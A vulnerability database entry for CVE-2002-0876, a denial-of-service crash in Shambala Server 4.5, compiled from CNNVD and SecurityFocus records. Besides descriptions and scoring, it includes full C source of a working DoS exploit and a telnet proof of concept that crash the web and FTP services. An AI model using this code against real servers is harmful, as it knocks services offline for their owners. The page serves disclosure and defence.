CVE-2002-0876
CVSS 5.0
Published: 2002-10-04 00:00:00
Last revised: 2008-09-05 16:29:11

[Original] Web server for Shambala 4.5 allows remote attackers to cause a denial of service (crash) via a malformed HTTP request.


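[CNNVD] Evolvable Shambala Server web service remote denial-of-service vulnerability (CNNVD-200210-045)

        Shambala Server is an integrated FTP, Web and Chat tool suited to small-scale users.
        The web service of Shambala Server mishandles malformed requests, which allows a remote attacker to carry out a denial-of-service attack.
        By connecting to port 80 and submitting an abnormal GET request, the web service of Shambala Server can be made to crash, resulting in a denial of service.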
        

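- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: NONE [no impact on the confidentiality of the system]
Integrity impact: NONE [no impact on the integrity of the system]
Availability impact: PARTIAL [may cause reduced performance or interrupted access to resources]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]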

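- CPE (affected platforms and products)

Product and version information (CPE) is not yet available

- OVAL (technical details for detection)

No related OVAL definition found

- Official database links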

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0876
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0876
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200210-045
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/4897
(VENDOR_ADVISORY)  BID  4897
http://www.iss.net/security_center/static/9225.php
(VENDOR_ADVISORY)  XF  shambala-web-request-dos(9225)
http://online.securityfocus.com/archive/1/281265
(UNKNOWN)  BUGTRAQ  20020709 Exploit for previously reported DoS issues in Shambala Server 4.5
http://archives.neohapsis.com/archives/bugtraq/2002-05/0282.html
(UNKNOWN)  BUGTRAQ  20020530 [[ TH 026 Inc. ]] SA #3 - Shambala Server 4.5, Directory Traversal and DoS

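- Vulnerability information

Evolvable Shambala Server web service remote denial-of-service vulnerability
Medium severity  Other
2002-10-04 00:00:00 2006-08-24 00:00:00
Remote

        Shambala Server is an integrated FTP, Web and Chat tool suited to small-scale users.
        The web service of Shambala Server mishandles malformed requests, which allows a remote attacker to carry out a denial-of-service attack.
        By connecting to port 80 and submitting an abnormal GET request, the web service of Shambala Server can be made to crash, resulting in a denial of service.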
        

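- Advisories and patches

        Temporary workaround:
        If you cannot install a patch or upgrade immediately, CNNVD recommends taking the following measures to reduce the threat:
        * Configure access control for the Evolvable Shambala Server web service on the firewall so that only trusted users can reach it.
        Vendor patch:
        Evolvable
        ---------
        The vendor has not yet provided a patch or upgrade. We recommend that users of this software watch the vendor's home page for the latest version: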
        
        http://www.evolvable.com/estore/product.asp?sku=1

- Vulnerability information (21498)

Evolvable Shambala Server 4.5 Web Server Denial Of Service Vulnerability (EDBID:21498)
windows dos
2002-05-31 Verified
0 Shambala
N/A
source: http://www.securityfocus.com/bid/4897/info

Shambala Server is an FTP, Web, and Chat server targeted for the Small Office/Home Office user.

It has been reported that Shambala Server's web server may be prone to a denial of service vulnerability. The denial of service condition is a result of the web server failing to handle malformed requests. 

/******** shambalax.c ***********************************************************
 *
 * PoC exploit for the DoS in Shambala Server 4.5
 * as described in Telhack 026 Inc. S.A. #3 (BID:4897).
 * I have also built in a function that exploits another
 * DoS condition found by zillion a long long time ago.
 * Also refined my DoS a little bit by just using one
 * char that messes up Shambala.
 *
 * By: Daniel Nyström (excE) <exce@netwinder.nu>
 *
 * Notes:
 * I found that zillion had only been almost right, it
 * is not opening a lot of TCP connections that generates
 * the DoS that he found, it is just one TCP connection,
 * but it certainly has to do with bad connection handling
 * by Shambala.
 *
 * Credits:
 * Zillion <zillion@safemode.org> - for discovering the FTP DoS
 *
 * Greetz:
 * Xenogen <*****@**********.***> - for promising to report any segfaults :)
 * X-Rewt  <*****@**********.***> - Cuz he's in my school :P
 * Telhack 026 Inc. crew - STOP phreaking, START doing something more fun :))
 *
 *********************************************************** shambalax.c ********/

#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <strings.h>    /* bzero() */
#include <unistd.h>     /* close() */
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>  /* inet_ntoa() */
#include <netdb.h>
#include <sys/socket.h>

int main(int argc, char *argv[])
{
	int sockfd;
	int port;

	struct sockaddr_in target;
	struct hostent *he;

	/* Expect exactly two arguments: target host and test type */
	if (argc != 3)
	{
		fprintf(stderr, "\n-- Shambala Server 4.5 DoS exploit --\n");
		fprintf(stderr, "\nUsage: %s <target> <type>", argv[0]);
		fprintf(stderr, "\nTypes:");
		fprintf(stderr, "\n1  -  HTTPD DoS");
		fprintf(stderr, "\n2  -  FTP DoS\n\n");
		exit(1);
	}

	printf("\n-- Shambala Server 4.5 DoS exploit --\n\n");
	printf("-> Starting...\n");
	printf("->\n");

	/* Resolve the target host name */
	if ((he = gethostbyname(argv[1])) == NULL)
	{
		herror("gethostbyname");
		exit(1);
	}

	if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
	{
		perror("socket");
		exit(1);
	}

	/* HTTPD DoS */
	if (argv[2][0] == '1')
	{
		port = 80;
		target.sin_family = AF_INET;
		target.sin_port = htons(port);
		target.sin_addr = *((struct in_addr *)he->h_addr_list[0]);
		bzero(&(target.sin_zero), 8);

		printf("-> Connecting to %s:80...\n", inet_ntoa(target.sin_addr));
		printf("->\n");

		if (connect(sockfd, (struct sockaddr *)&target, sizeof(target)) == -1)
		{
			perror("connect");
			exit(1);
		}

		printf("-> Sending httpd exploit string!! M4y th3 3v1L Shambala d13!!! :)\n");
		printf("->\n");

		/* The malformed request is a single '!' followed by CRLF */
		if (send(sockfd, "!\r\n", 3, 0) == -1)
		{
			perror("send");
			exit(1);
		}

		close(sockfd);
	}
	/* FTPD DoS */
	else if (argv[2][0] == '2')
	{
		port = 21;
		target.sin_family = AF_INET;
		target.sin_port = htons(port);
		target.sin_addr = *((struct in_addr *)he->h_addr_list[0]);
		bzero(&(target.sin_zero), 8);

		printf("-> Making a TCP connection (!which crashes server!) to %s:21...\n", inet_ntoa(target.sin_addr));
		printf("->\n");

		/* Connect and close immediately without sending any data */
		if (connect(sockfd, (struct sockaddr *)&target, sizeof(target)) == -1)
		{
			perror("connect");
			exit(1);
		}

		close(sockfd);
	}
	else
	{
		fprintf(stderr, "\n\nError: Bad type definition (use 1 or 2 for <type>).\n\n");
		exit(1);
	}

	printf("-> Exploit finished nicely. %s's Shambala is probably dead by now.\n\n", argv[1]);

	return 0;
}

/* EOF - Shambala Server 4.5 DoS exploit     */
/* Daniel Nyström (excE) <exce@netwinder.nu> */

- Vulnerability information

8443
Evolvable Shambala Server Malformed HTTP GET Request DoS
Remote / Network Access Denial of Service, Input Manipulation
Loss of Availability
Exploit Public

- Vulnerability description

Shambala Server contains a flaw that may allow a remote denial of service. The issue is triggered when a remote attacker sends a malformed GET request to the web server, which will crash the server, resulting in a loss of availability.

- Timeline

2002-05-30 Unknown
2002-05-30 Unknown

- Solution

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- Related references

- Vulnerability author

- Vulnerability information

Evolvable Shambala Server Web Server Denial Of Service Vulnerability
Failure to Handle Exceptional Conditions 4897
Yes No
2002-05-31 12:00:00 2009-07-11 01:56:00
Discovery credited to Daniel Nyström.

- Affected software versions

Evolvable Shambala Server 4.5
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0

- Vulnerability discussion

Shambala Server is an FTP, Web, and Chat server targeted for the Small Office/Home Office user.

It has been reported that Shambala Server's web server may be prone to a denial of service vulnerability. The denial of service condition is a result of the web server failing to handle malformed requests.

- Exploit

The following proof of concept was provided by Daniel Nyström:

you# telnet 192.168.0.11 80
Trying 192.168.0.11...
Connected to 192.168.0.11.
Escape character is '^]'.
GET !"#☼%&/()=?
Connection closed by foreign host.
you#

Daniel Nyström (excE) <exce@netwinder.nu> has also provided the following exploit:

- Solution

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- Related references

 

 
